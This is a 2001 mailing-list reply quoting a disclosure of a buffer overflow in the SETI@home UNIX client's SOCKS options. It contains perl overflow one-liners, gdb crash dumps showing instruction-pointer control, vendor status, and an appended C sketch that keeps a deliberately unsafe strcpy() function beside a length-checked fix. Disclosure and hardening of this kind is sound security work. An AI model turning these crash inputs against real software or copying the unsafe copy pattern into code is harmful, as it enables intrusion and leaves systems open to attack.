Re: Vulnerability in SETI@home

From: dotslash@snosoft.com
Date: 12/02/01


Date: Sat, 1 Dec 2001 23:33:49 -0800
To: joetesta@hushmail.com
From: dotslash@snosoft.com

Also, in Joe's post he did not show an EIP overwrite, but on OS X we are
able to overwrite the PC register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc-
apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'`
[Switching to thread 1 (process 612 thread 0x1907)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x41414140 in ?? ()
(gdb) i r
r0 0x278c 10124
r1 0xbfffd670 3221214832
r2 0x3021c 197148
r3 0x16250 90704
r4 0x201 513
r5 0x1a4 420
r6 0x400 1024
r7 0x2e 46
r8 0x170 368
r9 0x3 3
r10 0x53 83
r11 0x2cbc4 183236
r12 0x41414141 1094795585
r13 0x0 0
r14 0x0 0
r15 0x0 0
r16 0x0 0
r17 0x0 0
r18 0x0 0
r19 0x0 0
r20 0x0 0
r21 0x3 3
r22 0x0 0
r23 0x1 1
r24 0xffffffff 4294967295
r25 0x0 0
r26 0x0 0
r27 0x1 1
r28 0xbfffd7e0 3221215200
r29 0x0 0
r30 0x0 0
r31 0x2774 10100
pc 0x41414140 1094795584
ps 0x4000f030 1073803312
cr 0x22000284 570425988
lr 0x278c 10124
ctr 0x41414141 1094795585
xer 0x20 32
mq 0x0 0
fpscr 0x0 0
vrsave 0x0 0

-KF
On Sunday, December 2, 2001, at 03:15 PM, joetesta@hushmail.com wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI@home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project that
> allows ordinary citizens to participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default
> installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI@home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root@seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI@home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome'
> account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project director, Dr. Dave P. Anderson, was contacted via
> <davea@ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta@hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>


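As an added example, not part of either message above and not the SETI@home client's own code: a C sketch of the pattern the advisory describes (a command-line value copied with strcpy() into a fixed-size buffer, crashing inside strcpy() and overwriting EIP on Linux or PC on OS X), beside a length-checked replacement that refuses anything that does not fit. The struct, the function names and the buffer size SOCKS_FIELD_MAX are assumptions for illustration; the advisory only shows that values of roughly 5300 to 5600 bytes are enough to crash the real client. The 'A' x N inputs are constructed in the block, mirroring the perl one-liners in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size for illustration; the advisory gives no real buffer sizes. */
#define SOCKS_FIELD_MAX 256

struct socks_config {
    char server[SOCKS_FIELD_MAX];
    char user[SOCKS_FIELD_MAX];
    char passwd[SOCKS_FIELD_MAX];
};

/* The vulnerable pattern: no length check, so an over-long value runs past
 * dst and, as the gdb sessions show, into saved return addresses.
 * Kept only for comparison; never give it untrusted input. */
void set_field_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened replacement: look for the NUL only within dstsz bytes (a
 * 9000-byte argument is never scanned to its end), refuse a value that
 * does not fit, and leave dst untouched on rejection. 0 = ok, -1 = too long. */
int set_field_checked(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)                 /* no terminator within dstsz bytes */
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);   /* includes the NUL */
    return 0;
}

/* Store the three SOCKS options the advisory names using the checked copy.
 * Returns the number of options accepted, or -1 on the first over-long value. */
int parse_socks_args(struct socks_config *cfg, int argc, char **argv)
{
    int accepted = 0;
    for (int i = 1; i + 1 < argc; i++) {
        char *dst = NULL;
        if (strcmp(argv[i], "-socks_server") == 0)      dst = cfg->server;
        else if (strcmp(argv[i], "-socks_user") == 0)   dst = cfg->user;
        else if (strcmp(argv[i], "-socks_passwd") == 0) dst = cfg->passwd;
        if (dst == NULL)
            continue;
        i++;
        if (set_field_checked(dst, SOCKS_FIELD_MAX, argv[i]) != 0) {
            fprintf(stderr, "%s: value too long (max %d bytes)\n",
                    argv[i - 1], SOCKS_FIELD_MAX - 1);
            return -1;
        }
        accepted++;
    }
    return accepted;
}

/* Constructed input: `len` bytes of 'A', as perl -e 'print "A" x N' gives.
 * Returns set_field_checked's result; -3 if a rejection touched the buffer. */
int try_value_of_len(size_t len)
{
    char field[SOCKS_FIELD_MAX] = "unchanged";
    char *val = malloc(len + 1);
    if (val == NULL)
        return -2;
    memset(val, 'A', len);
    val[len] = '\0';
    int rc = set_field_checked(field, sizeof field, val);
    free(val);
    if (rc != 0 && strcmp(field, "unchanged") != 0)
        return -3;
    return rc;
}

/* Constructed argv: sane values, or the advisory's 5604-byte -socks_server. */
int demo_parse(int overlong)
{
    static char big[5605];
    memset(big, 'A', 5604);
    big[5604] = '\0';
    char *argv_ok[]  = { "setiathome", "-socks_server", "proxy.example",
                         "-socks_user", "alice", "-socks_passwd", "s3cret" };
    char *argv_bad[] = { "setiathome", "-socks_server", big };
    struct socks_config cfg;
    memset(&cfg, 0, sizeof cfg);
    if (overlong)
        return parse_socks_args(&cfg, 3, argv_bad);
    return parse_socks_args(&cfg, 7, argv_ok);
}

int main(int argc, char **argv)
{
    struct socks_config cfg;
    memset(&cfg, 0, sizeof cfg);
    int rc = parse_socks_args(&cfg, argc, argv);
    if (rc < 0)
        return 1;
    printf("accepted %d SOCKS option(s); server=\"%s\" user=\"%s\"\n",
           rc, cfg.server, cfg.user);
    return 0;
}
```

Built as-is, `./a.out -socks_user $(perl -e 'print "A" x 9000')` exits with "value too long" instead of reaching the crash shown in the gdb sessions. Rejecting rather than silently truncating matters for a proxy username or password: a truncated credential would be sent to the SOCKS server and fail in a way that is much harder to diagnose than an immediate error. Note that the setuid caveat in the advisory is unchanged by this: the fix removes the overflow, but an unprivileged local crash of a non-setuid client was never a privilege boundary in the first place.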
